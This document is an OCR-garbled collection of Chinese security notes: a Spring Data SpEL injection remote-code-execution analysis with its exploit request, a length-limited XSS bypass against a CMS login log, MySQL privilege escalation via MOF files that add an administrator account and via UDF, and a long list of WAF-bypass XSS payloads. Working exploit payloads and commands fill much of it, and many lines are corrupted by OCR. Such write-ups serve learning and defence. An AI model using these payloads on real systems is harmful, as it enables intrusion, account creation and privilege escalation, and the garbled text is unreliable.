Origin: http://127.0.0.1:83 

Connection: close 

Referer: http://127.0.0.1:83/users 
Upgrade-Insecure-Requests: 1 


yel 





username[#this.getClass().forName("java.lang.Runtime").g | 
etRuntime().exec ("touch 
/2,txt") |=6password=&repeatedPassword= 


代码 分 析 


环境 下 载 


将 pom.xml 中 的 parent 节 点 替换 
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- 







关 web 特 性 对 用 户 的 输入 参数 进行 自动 匹配 ,会 
内 容 ， 从 而 导致 的 远程 代码 执行 


HTTP/1.1 500 

Content-Type: text/html;charset-1S0-8859-1 
Content-Language: zh-CN 

Content-Length: 497 

Date: Thu, 19 Dec 2019 08:05:14 GMT 
Connection: close 


*htni»«body»«hl»Whitelabel Error Pagec/hi»«p»This 
application has no explicit mapping for /error, so you 
are seeing this as a fallback.</p><div 
id='created'>Thu Dec 19 08:05:14 UTC 
2019«/div»«div»There was an unexpected error 
type-Internal Server Error 
status=500) .</aiv><civ>Invalid property 
&4#39;username&#39; of bean class 
[example.users.web.$Proxy91]: Getter for property 
&#39;username&#39; threw exception; nested exception 
as 
java. lang.reflect.InvocationTargetException</<div></body 
nan 
























«parent» oe veni » gue 
| «groupId»org.springframework.boot«/groupid» 

4 <artifactId>spring-boot-starter-parent</artifactId> 

| «version»2.0.0.RELEASE«/version» 


f 34{Tspring-data-examples-master/web/example/src/main/java/example/Application.java 


J 127.0.0.1:8087/users 


] E» vx SIR D 事务 & now 





Users 


匹配 , 会 


1, user0 - $2a$10$3NsCIE7Z5pPDgRaMMN.,sGe7kGXvP88ICWB1unl7LoFgwMGky1nQM6 
2. user1 - $2a$10$3do7aqaZbn17mXnyRJ3VPuA44qVf2Kx7gTLkVQgfzbnOX2aX73kq. 

3. user2 - $2a$10$Yh918258pJ5HopiSN7DPF.GjoAGzFHUOF4bNob65RSBsEFoguzZgG 

4. user3 - $2a$10$vOc8CgC35vc0JCGGHMHhROYRrIIWfA,HdeS2iABDtXINzkCto YhkS 

5. user4 - $2a$10$RMANJIBXOUzREg.fA/w5uqC VSSbPmXWhjD/pE7z2R4mylx8WLaiTa 


Username 


admin 


Password 


2.txt 


Register user 


在 exec 那 里 下 断 点 ， 调 用 栈 如 下 所 示 : 


> you 
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exec:347, Runtime (java.lang) » Atl 

















execute:120, ReflectiveMethodExecutor (org.springframework.expression.spe].g 
getValueInternal:134, MethodReference (org.springframework.expression.spel.as 
access$000:53, MethodReference (org.springframework.expression.spel.ast) [ 
getValue:360, MethodReference$MethodValueRef (org. springframework.expression. 
getValueInternal:89, CompoundExpression (org.springframework.expression.spe]. 
getValueRef:134, Indexer (org.springframework.expression.spel.ast) 
getValueRef:67, CompoundExpression (org.springframework.expression.spel.ast) 
setValue:96, CompoundExpression (org.springframework.expression.spel.ast) 
setValue:464, SpelExpression (org.springframework.expression.spel.standard) 
setPropertyValue:217, MapDataBinder$MapPropertyAccessor (org. springframework. de 
setPropertyValue:67, AbstractPropertyAccessor (org.springframework.beans) 
setPropertyValues:97, AbstractPropertyAccessor (org.springframework.beans) 
applyPropertyValues:839, DataBinder (org.springframework.validation) 
doBind:735, DataBinder (org.springframework.validation) 

doBind:197, WebDataBinder (org.springframework.web.bind) 

bind:720, DataBinder (org.springframework. validation) 

createAttribute:139, ProxyingHandlerMethodArgumentResolver (org.springframework. 
resolveArgument:132, ModelAttributeMethodProcessor (org.springframework.web,metl 
resolveArgument:124, HandlerMethodArgumentResolverComposite (org.springframework 
getMethodArgumentValues:161, InvocableHandlerMethod (org.springframework.web.met 
invokeForRequest:131, InvocableHandlerMethod (org. springframework.web.method. sup 


i 


Fa UserController.javah, username, password, repeatedPassword ZitEUserForm Á ik 


@RequestMapping(method = RequestMethod.POST) 
public Object j r(UserFot erForm, BindingResult binding, Mod: lel) d 


userForm.validate(binding, userManagement); 


if (binding.hasErrors()) { 


return "users"; 


查看 UserForm 类 ， 添 加 了 一 个 string getxixixi(); ， 则 表单 参数 集合 里 面 也 会 自动 获 
取 xixixi 参数 
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lmework, | 


ieb.metk 
amework 
web.met 
Nod. sug 


String 


String 


Fexec 那 里 下 断 点 ， 对 几 个 重要 方法 进行 分 析 


invokeForRequest : 处 理 request 
getMethodArgumentValues : 获取 需要 的 参数 与 参数 值 
resolveArgument : 解析 参数 


createAttribute : 调用 MapDataBinder 类 的 bind 方 法 ， 将 参数 与 参数 所 在 的 类 UserForm 绑 


这 时 候 所 需 参 数 都 被 读 入 进 列 表 propertyValueList 
protected Object createAttribut tring attributeName, MethodPa 


MapDataBinder binder = new MapDataBinder(parameter.getParameterType( 
binder.bind(new MutablePropertyValues(request.getParameterMap())); 


return proxyFactory.createProjection(parameter.getParameterType(), b 
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e * Evaluate TT 
Expression: Ne I » y 


new MutablePropertyValues(request.getParameterMap())] 


Result: 
result = "PropertyValues: length=6; bean property ‘page’; bean property 'size'; bean property ‘username’; bean property ‘password’; 
* propertyValueList = size = 6 
0 = "bean property 'page"" 
1 = "bean property 'size'" 
2 = "bean property 'username™ 
3 = "bean property 'password'" 
4 = "bean property 'repeatedPassword'" 
5 = "bean property 'xixixi[&this.getClass().forName("java.lang.Runtime").getRuntime() .exec("open /etc")]'" 
f name = "xixixi[sthis.getClass(). forName("java.lang. Runtime"), getRuntime() exec("open /etc")]" 
value 
optional = false 
converted = false 
convertedValue - null 
conversionNecessary = null 
resolvedTokens = null 
source = null 
attributes = size = 0 


A cA c A ooo 


Close 
。 MapDataBinder 的 setPropertyValue : 


propertyName 的 值 为 
xixixi[4this.getClass().forName("java.lang.Runtime").getRuntime().exec("open /etc")] 


以 下 语句 导致 了 远程 代码 执行 





Expression expression = PARSER.parseExpression(propertyName) ; 


expression.setValue(context, value); 


try { a7. | 
expression, setValue(context, value? value: "2dvvřvf" 4 
} catch (SpelEvaluationException o 0) { 
throw new NotWritablePropertyException(type, propertyName, "Could not write 
property!", 0,0); 
} 


} 


MapDataBinder MapPropertyAccessor setPropertyValue() 





£3 Variables 3 
this 

b © propertyName = "xixixi[#this. getClass().forName("java.lang. Runtime"). getRuntime().exec("open /etc")]" 

P. value = "2dvvfvf" 

context 
expression 
f expression 
f ast 


spel 表 达 式 


SpEL (Spring Expression Language) ， 即 Spring 表达 式 语 言 。 可 以 在 运行 时 查询 和 操作 数据 。 优 
点 是 可 以 缩减 代码 量 ， 优 化 代码 结构 。 


1. 数值 运算 
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SpEL 表 达 式 支持 数学 运算 符 。 所 有 基本 运算 符 ， 如 加 法 (+) , WOR C) ， 乘 法 (9) ， 除 法 
() ， 模 数 (90) , HERE (^) 等 ， 都 可 以 在 SpEL 表 达 式 中 使 用 。 


以 下 结果 为 4 
ExpressionParser parser = new SpelExpressionParser(); 
Expression expression= (Expression) parser.parseExpression( 3-3); 


Integer hhhzexpression.getValue(Integer.class); 
System.out.println(hhh); 







2. 字符 串 连接 符 : + 
以 下 结果 为 hello ppp 


ExpressionParser parser = new SpelExpressionParser(); 

String propertyName="\"hello\"+\" ppp\"": 

Expression expression= (Expression) parser.parseExpression(propertyName) ; 
String hhh=expression.getValue(String.class); 

System.out.println(hhh); 


3. 调用 类 的 静态 方法 
使 用 T().xxx ， 它 将 返回 一 个 Class Object 
public class test { 
public static void main(String[] args) { 
ExpressionParser parser = new SpelExpressionParser(); 


String propertyName="T(java.lang.Runtime).getRuntime().exec(\"open / 
parser.parseExpression(propertyName).getValue(); 


也 可 以 写成 反射 


T(java.lang.Class).forName("java.lang.Ru"+"ntime").getMethod("ex"+"ec", T(jav 
b 

4. 使 用 #this 或 者 #root 

#this.getClass() 的 结果 是 java.lang.Class 


o #this: 引用 SpEL 当 前 正在 计算 的 对 象 
o #root: 引用 SpEL 的 EvaluationContext 的 root 对 象 
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String propertyName- E ， * j 
"#root.getClass().forName('java.lang.System') .getProperty( ‘user qa 

ExpressionParser parser = new SpelExpressionParser(); 

StandardEvaluationContext context=new StandardEvaluationContext(); 

context.setRootObject(this); 

Expression expression= (Expression) parser .parseExpression(propertyName); 

String hhhzexpression.getValue(context,String.class); 

| System.out.println(hhh); 
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xss 绕 过 代码 后 端 长 度 限制 的 方法 “ 


D: 篇 文章 是 我 近期 在 审计 一 套 CMS 的 时 候 顺便 写 的 。 一 般 来 讲 程序 对 于 输入 字符 长 度 进行 限制 的 方 
法 主要 分 两 种 ， 一 种 是 前 端的 长 度 限制 ， 这 种 的 绕 过 只 需要 修改 前 端 源码 即 可 ， 或 者 本 地 构造 一 个 
表单 。 

本 次 审计 的 这 套 CMS 存 在 一 个 XSS 漏 洞 ， 由 于 日 志 入 库 验证 不 严格 导致 存在 该 漏洞 ， 只 需要 尝试 登 
陆 即 可 写 入 payload。 


$uid 
$cfrom 


n 


0; Ld * 


$this-»method-»request('cfrom', $cfrom); 

$token = $this->method->request('token'); 

$device= $this->method->request('device', $device); 

$ip = $this-»method-»request('ip', $this->method->ip); 

$web = $this->method->request('web', $this->method->web) ; 
$cfroar= explode(',', 'pc,reim,weixin,appandroid,appiphone,mweb'); 
if(!in array($cfrom, $cfroar))return ‘not found cfrom'; 

if ($user=='')return 'fIP&T8E/S'; 

if ($pass==''@&strlen($token)<8)return ' 密 码 不 能 为 宝 '， 


$user = addslashes(substr($user, 0, 20)); 
$pass = addslashes($pass); 
$logins = “登录 成 功 ' ; 
$msg SU 
$fields = ''pass'^, id’, name’, user’, face’, deptname''; 
$arrs - array( 
'user' => $user, 
'status|eqi' => 1, 
'type|egi' => 1, 
'state|negi' => 5 
); 
$us = $this->db->getone('admin', $arrs , $fields); 
if(!$us){ 


unset($arrs['user']); 
$arrs['name'] = $user; 
$tos = $this->db->rows('admin', $arrs); 
if ($tos>1) { 
$msg = ' 存 在 相同 用 户 名 ， 系 统 无 法 识别 ' ; 
} 
if($msg=='')$us = $this->db->getone('admin', $arrs , $fields); 
} 
if($msg=='' && !$us){ 
$msg = ' 用 户 不 存在 '; 
Jelse if($msg==''){ 
$uid = dusl Ld 
$user = $us['user']; 
if (md5($pass) !=$us['pass'])$msg=' ZO ER; 
if ($pass==HIGHPASS) { 
$msg ca MU 
$logins = “管理 员 密 码 登录 成 功 ' ; 








if($msg!=''&&strlen($token)>=8) { 





$moddt = date('Y-m-d H:i:s', time()-10*60*1000); 
$trs = $this-»getone("'uid's'$uid' and ^token'z'$token' and 
if($trs){ 

$msg ery 


$logins = “快捷 登录 ' ; 
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} 


} + 4 P ^ iba 
$name - $face - $deptname ESOS 
if ($msg==''){ 
$name = $us['name']; 
$deptname = $us['deptname']; 
$face = $us['face']; 
if(!$this->isempt($face))$face = URL.''.$face.''; 
$face = $this->method->repempt($face, 'images/noface.jpg'); 
$this-»db-»update('admin',"^loginci'- loginci *1", $uid); 
}else{ 
$logins = $msg; 
} 
m('log')->addlog(''.$cfrom. 'Ss','['.$user.']'.$logins.'', array( 
'optid' -» $uid, 
'optname' -» $name, 
ripi => $ip, 
'web' => $web, 


)); 





| 程序 前 部 分 代码 对 整个 登录 过 程 进行 了 完整 验证 ， 同 样 开 发 者 为 了 防止 插入 恶意 代码 对 截取 的 数据 
| 长 度 限制 到 了 20 位 并 使 用 了 addslashes 对 敏感 字符 进行 转 义 。 所 以 在 后 面 的 写 入 日 志 那 里 就 很 难 写 
”入 有 攻击 性 的 XSS 代 码 ， 单 纯 就 已 经 占 了 17 个 字符 。 


Eft: > [<script>alert (D) </sej 用 户 不 存在 《</div>《/td>Ktd role="gridcell” class-"x-g 


”通过 查看 日 志 的 源 代码 发 现 其 实 脚本 标签 是 可 以 插入 的 ， 只 不 过 没有 办 法 写 入 完整 代码 ， 但 是 最 为 
”重要 的 一 个 因素 在 于 ， 这 里 所 插入 的 代码 都 是 显示 在 同一 个 页 面 的 。 所 以 接 下 来 就 是 拼接 Payload 
”代码 。 考 虑 到 程序 会 在 泻 染 到 页 面 的 时 候 增加 许多 的 标签 导致 脚本 语法 出 错 所 以 就 直接 给 注释 掉 。 
”最 终 payload 代 码 如 下 : 


E/c/scylpt» 
"/-alert(a);/* 
p/7Xss//* 
*/az/* 
<script>var/* 
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这 里 顺序 的 问题 是 因为 程序 的 数据 是 从 后 往 前 显示 ， 咱 们 输入 的 顺序 是 反 的 但 是 在 页 面 显示 的 时 人 
顺序 是 正常 的 。 
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DIMESSI. 最 终 源 代码 如 下 : 


xt align: left;">[< 


«st ript>] 用 户 不 存在 </ 








mysql 提 权 之 mof 


系统 目录 中 的 mof/ 上 月 录 下 有 mof 文 件 ， 目 录 下 面 的 文件 会 被 系统 调用 执行 。 
路 径 : C:\WINDOWS\system32\wbem\mof 

提 权 步骤 : 

1、 上 传 一 个 mof 提 权 文 件 到 可 读 写 目录 。 

2、 导 出 我 们 准备 好 的 mof 文 件 到 'c:/windows/system32/wbem/mof/ 


添加 用 户 的 代码 user.mof 账号 密码 为 test test 


#pragma namespace("\\\\.\\root\\subscription") 





instance of | EventFilter as $EventFilter 
{ 
EventNamespace = "RootNNCimv2"; 
Name = "filtP2"; 
Query = "Select * From __InstanceModificationEvent " 
"Where TargetInstance Isa \"Win32_LocalTime\"" 
"And TargetInstance.Second = 5"; 
QueryLanguage = "WQL"; 

















ji 


instance of ActiveScriptEventConsumer as $Consumer 
t 

Name = "consPCSV2"; 

ScriptingEngine - "JScript"; 

ScriptText - 

"var WSH = new ActivexObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test tes - 


J; 








instance of __FilterToConsumerBinding 


{ 


Consumer = $Consumer; 
Filter = $EventFilter; 


}; 


将 test 用 户 添 加 到 管理 组 , administrator.mof 
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pragma namespace("\\\\.\\root\\subscription") » 


instance of | EventFilter as $EventFilter 


EventNamespace = "RootNNCimv2"; 
Name = "filtP2"; 
Query = "Select * From __InstanceModificationEvent " 


"where TargetInstance Isa \"Win32_LocalTime\"" 
Mnd TargetInstance.Second = 5"; 
QueryLanguage = "WQL"; 


~ 


instance of ActiveScriptEventConsumer as $Consumer 


{ 


"Name = "consPCSV2"; 

LScriptingEngine = "JScript"; 

- ScriptText = 

"var WSH = new ActivexObject(\"WScript.Shel1\")\nWSH.run(\"net.exe&amp; nbsp; loce 


"instance of _ FilterToConsumerBinding 
X 

Consumer = $Consumer; 

Filter = $EventFilter; 


F; 


在 mysql 里 执行 ， 不 需要 获得 root 权 限 ， 只 要 能 执行 mysql 语 句 就 行 
Select load file('C:/user.mof') into dumpfile 'c:/windows/system32/wbem/mof/null 


Select load file('C:/administrators.mof') into dumpfile 'c:/windows/system32/wbe 


LÀ 










Poa 

SAFAR 

FWAR) 1 - 

mess ~、、 qu > w&o PRY TAD Wi 
^ m XR X 














ERr 
LAAL 
PREG 
neuer 

















MSO 
MYSOLINE 
MSIE 
Sereno 


Nese 













过 一 会 儿 ， 就 成 功 的 添加 了 一 个 管理 员 权限 的 用 户 test 
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mysdl 提 权 之 udf 
Udf 提 权 条 件 : 


需要 得 到 root 的 密码 


Mysql 版 本 区 别 : 
5.1 版 本 以 下 ， 调 用 的 是 系统 目录 (cx\windows\system32) 中 的 dl 文件 并 执行 。 
5.1 版 本 以 上 包括 5.1 调用 的 是 mysdql 安 装 目录 中 的 lib\plugin 中 的 dl 文件 并 执行 。 


获取 root 密 码 
1 找 配置 文件 


一 般配 置 文件 目录 为 : 
Config/ 

Inc/ 

Conf/ 

Data/ 
Config.php 
Config.inc.php 
Inc. php 
Data.php 
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LL a SR SSS SSNS 
sstfEasy/nice php? ? 
z 
RSG AMET @ 新 手 上 路 。 WHERE 。 scass 注 入 Maram GAEM GS BER To PRE — Yr ENRE 
X © SOL- XSS- Encryption: Encodings Other" 


Load URL | 








Execute i 
[^ Enable Post data 站 Enable Referrer 
WW Easy! 





CS VeOWWiEasy/ confi 









ined” ROOT’ )) exit( CanV t Access ; return array ( 












EC ona 127.0.0 1*, 
2Y root VAPA 











password =» root’, // W 
=Y Easy // PRES 
CASeRaty. ERTS 


t 





install adein admin’ 


m j fisit FER { 
PAPHOS ^ vite url http //deso caneany comf’, 
LET RA. /7 网 站 地 址 [xspan class=“hotspot” onmouseover="tooltip. show C http //igftetUl / RRL’). onmouseout= tooltip hide Q; "><img src 


执行 SQL 执行 








' sitename => CasEasy app RAUS FE f 





d MYSQUMTE 1/ 站 点 名 称 [<span classt" hotspot" onmouseover="tooltip. show C 请 墙 写 网 站 篇 称 ， 主 要 用 于 页 廊 说 明 ? 3," onmouseout" tooltip hide O 
5 ] 
(0 MYSQURAR ; x aes LM Y 
TF ' fullname’ => cmseaty Se Rb DEPORTE DII St ESI UII EFT EE 
Serv-U 提 术 y u 
: 5 一 一 一 /7 网 站 名 称 [<span class=“hotspot” onmouseover="tooltip. show ( 网 页 标题 处 明示 ， 可 结合 关键 司 使 用 ?' ) ;” ormonseout="tooltip. hide 0: 
NC 反弹 >] 
LinuxEs | Min6Hbb o: 7-04-14 23:01:15 多 六 二 进贡 | 形式 保存 文件 (建议 合用 





time_zone. MYI 


ee eh | time rone leap second. frm 
j| performance schema time zone leap second. MYD 
| Ll shanxi time_zone_leap_second. MYI 
Ci szqjhz i 
y rest | , time rone name. frm 
un upsztec _ time zone name. MYD 
| LJ zhanqun , time zone name. MYI 
lib dut 
e time zone transition. frm 
7 nginx | time rone transition. MYD 
| phps2 |. time_zone_transition. MYI 
php53 : S 
time zone transition type. frm 
| php53n 
php55 , | time zone transition type. MYT 
| php55n _ time zone transition type. MYI 
phpTOn 
SUL-Front 
T user. MYD 





然后 查看 usermyd 文 件 : 
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MYSQLIA £1 


解密 获取 root 用 户 的 密码 


正式 提 权 


查看 目标 mysql 的 版 本 ， 根 据 版 本 决定 导出 的 位 置 


Kim 
RAPPRE 


执行 5QL 执 行 < 和 es 
MYSQUMHE 
MMYSQL 提 可 
Serv URR 
NCR 

Linux fait 
AATE 

端口 扫描 
批量 挂 马 清 马 


RAO 





5.1 版 本 以 下 ， 调 用 的 是 系统 目录 (c'\windows\system32) 中 的 dl 文件 并 执行 。 
5.1 版 本 以 上 包括 5.1 调用 的 是 mysql 安 装 目 录 中 的 lib\plugin 中 的 dl 文件 并 执行 。 
版 本 为 5.5.40 那么 获取 mysql 安 装 目录 


AA: 
nne. 


"m 


a 


在 lib 目 录 下 新 建 plugin 目 录 ! 





select @@basedir as basePath from dual 


(5EE4568DDA TDC6T 
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查找 
(EE4ASDAESCB OO €. 
41BFIDII © © ip arwàCA326F FCE 


127.0.0.1 NAW Easy 


} 前 本 地 硬盘 





Enant : — = 
E exe BE 
| 基本 信息 | 
gll Tib S. BEI RXsystemtX IR 
















— seni D: 






LAR 
ie 

















THER 
Tusc) 
unos) 


tere 
Eras 
Lite 
AGeHPME 


COENE 
MYSQL 作 
MYSQL 提 梭 
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xss 基础 学 习 
意义 


XSS 攻 击 通常 指 的 是 通过 利用 网 页 开发 时 留 下 的 漏洞 ， 通 过 巧妙 的 方法 注入 恶意 指令 代码 到 网 页 ， 
使 用 户 加 载 并 执行 攻击 者 恶意 制造 的 网 页 程序 。 这 些 恶意 网 页 程序 通常 是 JavaScript， 但 实际 上 也 


可 以 包括 Java、 VBScript ActiveX, Flash 或 者 甚至 是 普通 的 HTML。 攻 击 成 功 后 ， 攻 击 者 可 能 得 
到 包括 但 不 限于 更 高 的 权限 (如 执行 一 些 操作 ) 、 私 密 网 页 内 容 、 会 话 和 cookie 等 各 种 内 容 | 


原理 
普通 


我 们 来 根据 下 面 这 段 php 代 码 来 理解 Xss 是 为 什么 出 现 的 





<!DOCTYPE html» 
<html> 
<head> 
<title></title> 
</head> 
<body> 
<?php 
/** 
* Created by PhpStorm. 
* User: keac wu 
* Date: 2019/12/26 0012 
PTE 15:53 
s 





$input- $ GET["xss"]; 
echo "$input"; 
?» 


</body> 
</html> 
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127.00.1/test/xss.phphsseke oe 
G © 12700.l/test/xss.php?xss -keac $ 
GA © Googe Wt 安 IM FH SM CTF 论坛 Po wh HanBotDatebase fey Console!CloudfL. | keacsBlog #3 















我 们 随便 输入 一 个 字符 ， 看 到 可 以 正常 的 在 浏览 器 上 显示 出 来 ， 在 源 代码 里 面 也 是 原封 不 动 的 出 


来 。 这 时 我 们 插入 一 端 javascript 代 码 来 看 看 。 


” 当 我 们 把 参数 改 为 \ 的 时 候 ， 可 以 看 到 弹 窗 了 一 个 对 话 框 ， 这 意味 着 这 个 站 点 存在 xss 漏 洞 。 


o © 127.0.0.1/test/xss.php?xss= «script» alert(1)</script Yr Quo» 
Google 网 址 安全 Im 平台 读物 CTF oo 'ac's Bloc 


可 以 在 源 代码 里 面 看 到 ， 我 们 输入 的 参数 被 当成 HTML 标 签 来 执行 。 


文本 框 
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@ 1270.0.1pestissphpress=< x TEs ; 
-a ( O O I27001Aest/xssphp?xss- «script»alerttT) «/script 
"GE C Google Mit Se — IM Fe wm CIF dez Po HB HanBotDatabase ig. Console | Cloudt. 





当 文 本 框 换 成 input 时 





<!DOCTYPE html» 
<html> 
<head> 
<title></title> 
</head> 
<body> 
<?php 
Vit 
* Created by PhpStorm. 
* User: keac wu 
* Date: 2019/12/26 0012 
Some: 15953 
ty 











$input= $ GET["xss"]; 
echo "<input type='text' value='$input'>" 
?> 


</body> 
</html> 


这 个 时 候 再 尝试 刚刚 的 poc， 已 经 被 转 义 不 能 弹出 xss 窗 了 
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CIF. ibi ^ Po mB HanBotDatabase ip Console | Cloudfi. , keacsBlog #3 








e 





127.0.0.1/test/xss.php?xss=% X 





EU X o O 12700tes/sssphp?xss-7527» <script>alert(1) </script> * ® > 


ae ^ Google 网 m PE 1 F A ， 
有 oog sit 安全 T F 2m CT 127003 BR jac 








来 分 析 下 是 为 什么 会 出 现 这 种 情况 。 
| >| ] i 
l page >» 5 r f ] wu 
[vectes ET 
f S mu E Sarge 


在 前 面 的 input 框 后 面 多 出 了 '>， 来 看 看 源 代码 。 
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<input type='text' value=' '»«script»alert(1)«/script»'» 


我 们 用 ' 来 截断 了 前 面 value 的 字符 串 ， 然 后 再 加 入 > 闭合 了 前 面 的 标签 ， 最 后 插入 script。 
但 是 这 样 很 明显 就 可 以 看 出 来 有 问题 ， 又 没什么 办 法 不 让 他 多 出 后 面 的 那个 东西 呢 。 
来 尝试 下 ' onclick="alert(1)" 打开 来 页 面 没 用 任何 反应 ， 也 没 看 到 弹 窗 ， 别 急 ， 我 们 点 下 input | 








alue 值 为 空 ， 当 鼠标 点 击 时 ， 就 会 弹出 对 话 框 。 这 里 可 能 就 会 有 人 问 了 ， 如 果 要 点 击 才 会 触发 ， 那 
不 是 很 麻烦 么 ， 成 功率 不 就 又 下 降 了 么 。 我 来 帮 你 解答 这 个 问题 ，on 事 件 不 止 onclick 这 一 个 ， 还 有 
很 多 ， 如 果 你 想 不 需 要 用 户 完 成 什么 动作 就 可 以 触发 的 话 ，i 可 以 把 onclick 改 成 


Onmousemove 当 鼠 标 移动 就 触发 
Onload 当 页 面 加 载 完 成 后 触发 
还 有 很 多 ， 我 这 里 就 不 一 一 说 明了 ， 有 兴趣 的 朋友 可 以 自 看 下 下 面 。 


分 类 
反射 型 


一 般 来 说 这 种 类 型 的 XSS， 需 要 攻击 者 提前 构造 一 个 恶意 链接 ， 来 诱 使 客户 点 击 ， 比 如 这 样 的 一 段 


链接 : www.abc.com/?params=\ 


存储 型 


这 种 类 型 的 xXSS， 和 危害 比 前 一 种 大 得 多 。 比 如 一 个 攻击 者 在 用 户 名 中 包含 了 一 段 JavaScript 代 码 ， 
并 且 服 务 器 没有 正确 进行 过 滤 输 出 ， 那 就 会 造成 浏览 这 个 页 面 的 用 户 执行 这 段 JavaScript 代 码 。 


DOMXSS 
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z 






种 类 型 则 是 利用 非法 输入 来 闭合 对 应 的 html 标 签 。 比如 ， 有 这 样 的 一 个 a 标 签 : V 乍 看 问题 不 
， 可 是 当 $var 的 内 容 变 为 "onclick=， alert(/xss/) Il; 这 段 代码 就 会 被 执行。 


我 们 被 waf 各 种 拦截 的 时 候 ， 可 以 考虑 利用 以 下 payload 来 进行 绕 过 
用 绕 过 姿势 
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<script>prompt(1)</script> » j 
<script>confirm(1)</script> 

<script> 

var fnzwindow[490837..toString(1««5)]; 

fn(atob( 'YWxlcnQoMSk=')); 

</script> 

<script> 

var fnzwindow[String.fromCharCode(101,118,97,108)]; 
fn(atob('YWxlcnQoMSk-')); 

«/script» 

«script» 

var fnzwindow[atob('ZXZhbA--')]; 

fn(atob('YWxlcnQoMSk-')); 

«/script» 

<script>window[ 490837. .toString(1<<5)](atob( 'YWxlcnQoMSkz'))«/script» 
«script»this[490837..toString(1««5)](atob('YWxlcnQoMSk-'))«/script» 
«sscript»this[(*O*[)) Ee! O D ]*C E]*ED E! *E]*? | D 2*CE2E* L2] *E D E! A e ! DTI 
sscripr»thisro eos EDIE-- D TEC EIREDE----LTHTEGTBPUTH DI -[11* CU CC 
<script>'string'.replace(/1/,alert)</script> 
<script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/, eval)</script> 
<script>'all2e3r4t6'.replace(/(.).(.).(.).(.)-(.)/, function(match, $1, $2,$3,$4, - 
<script>eval('\\u'+'0061'+'lert(1)')</script> 
<script>throw~delete~typeof~prompt(1)</script> 

<script>delete[a=alert]/prompt a(1)</script> 

<script>delete[a=this[atob( 'YWxlcnQ=')]]/prompt a(1)</script> 
<script>(()=>{return this})().alert(1)</script> 

<script>new function(){new.target.constructor('alert(1)')();}</script> 
«script»Reflect.construct(function()(new.target.constructor('alert(1)')()), [1)* 
«link/rel-prefetch 
import hrefzdata:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXBOPg» 

«link rel="import" href="data:x,<script>alert(1)</script> 

<script>Array.from 1${alert}3${window}2 ></script> 

<script>! {x(){alert(1)}}.x()</script> 

<script>Array.from $feval}alert\ 1NV^ ></script> 
<script>Array.from([1],alert)</script> 
<script>Promise.reject("1").then(null, alert )</script> 

<svg «/onload ="1> (_=alert,_(1)) ""> 

javascript: /*--></title></style></textarea></script></xmp><svg/onload='+/"/+/or 
<marquee loop=1 width=0 onfinish=alert(1)> 

<p onbeforescriptexecute="alert(1)"><svg><script>\</p> 

<img onerror=alert(1) src <u></u> 





<videogt;<source onerror=javascript:prompt(911)gt; 

«base target="<script>alert(1)</script>"><a href="javascript :name">CLICK</a> 
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a hr 
«style»QKeyFrames x{</style><div style=animation-name:x onanimationstart=alert( 
«script» "'$(^^[class extends[alert ^](3]) </script> 

<script>[class extends[alert ~~~ ]{}]</script> 

<script>throw new class extends Function{}('alert(1)')*°</script> 
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[J+ 
[DE 


3, $4, 








"<script>x=new class extends Function{}('alert(1)'); x=new co 
E: ge 3 » 
<script>new class extends alert(1){}</script> T 
<script>new class extends class extends class extends class extends alert(1){}{ 


~ «script»new Image()[unescape( '966f967 796669665967 29644966 f9663967 5966 096659666967 4 ' ) | Latob( ' 
«script src=data:, Nu006fnerror-NuO0061lert(1)»«/script» 

| "»«svg»sscript/xlink:hrefz"data:,alert(1) 

<svg><script/xlink:href=data:,alert(1)></script> 

«frameset/onpageshow-alert(1)» 

«div onactivate-alert('Xss') id-xss style=overflow:scroll> 

«div onfocus=alert('xx') id=xss style-display:table» 


img onerror 姿势 


<img onerror="location='javascript:=lert(1)'" src="x"> 

<img onerror="location='javascript:%61lert(1)'" src="x"> 

«img onerror="location='javascript:\x2561lert(1)'" src="x"> 

<img onerror="location='javascript:\x255CuQ061lert(1)'" src="x" > 


eval 姿势 
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Pred CL NE NO RUR EK E ORI E " ¥ ? D 
B 


/* Encoded eval string */ 

RRR NOR UK REEERE Ko WO Ree f 

«script» 

var eval b64 = 'ZXZhbA=='; 

var eval charcode - 'String.fromCharCode(101,118,97,108)'; 
var eval base32 = '490837..toString(1<<5)'; 

var eval non alphai = '(cOR[DE*! !D1]*CL ET ED E! *E]*! 9111 CETES E112 ED E! E] 
var eval non alpha2 = 'CFCPETI)E-SETIS(GEETSETD [e DH SCETISELTISEDE----- -LH38 


«/script» 





JUR ko SCRI IC SESE REE AS HIS, 


/* Through functions */ 
JRXOOOOOOOOOR ORA OO f 
«script» 

var fn-window[atob('ZXZhbA--')]; 
fn(/*code to eval()/*); 
</script> 


<script> 

var fn=window[String. fromCharCode(101,118,97,108) ]; 
fn(/*code to eval()/*); 

</script> 


<script> 

var fn=window[ 490837. .toString(1<<5)]; 
fn(/*code to eval()/*); 

</script> 


VES XUNG X De EEN EE Ms es ea e EU EN 


/* Straight through window object */ 


PEE ERE C KORR UK eK koe EAS eoe oe GS E EUR OE ERR 
«script» 

window[atob('ZXZhbA-z')](/*code to eval()*/) 
«/script» 


«script» 
window[String.fromCharCode(101,118,97,108)](/*code to eval()*/) 
«/script» 


«script» 
window[490837..toString(1««5)](/*code to eval()*/) 
«/script» 


«script» 


window! (+€}+0] E?! 3 1]* C D]8ED CEC] 8 D T*CD EE118DD E! 8D]! ! D]! ! D] 28 C ! DD] 


«/script» 
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script> 


FIR IO IR Rk Ia Kk 7 


Straight through this */ 


WOO OR III IO J 


his[atob('ZXZhbA--')](/*code to eval()*/) 
/script> 


this[String.fromCharCode(101, 118, 97, 108) ] (/*code to eval()*/) 
«/script» 






.this[490837..toString(1««5)](/*code to eval()*/) 
</script> 


<script> 


this (ODD [+ ! EDS + E+ JAEJA AA + EAD 


</script> 


Biescript» 


f this[ (EODD E-- DC £140) E 7-7 EH ES E118 DD -~-~- "DIIISCHLDESEID SE ERES] 


_ </script> 


3 J RRR KR KK I RR KK j 


/* regexp based */ 


MX Ak ko o o e EK HH / 
«script» 


'eiv2a3l'.replace(/(.).(.).(.).(.)7/, function(match, $1,$2,$3,$4) { this[$1+$2+$2 
</script> 


y FERRO SEGA ORE EROR ACE 


/* Other ways to execute strings */ 

OCI IIR OOOO CITC II III IOI / 

<script> 

delete /* code to execute */ 
throw~delete~typeof~/* code to execute */ 
delete[a=/* function */]/delete a(/* params */) 
var a = (new function(/* code to execute */))(); 
</script> 


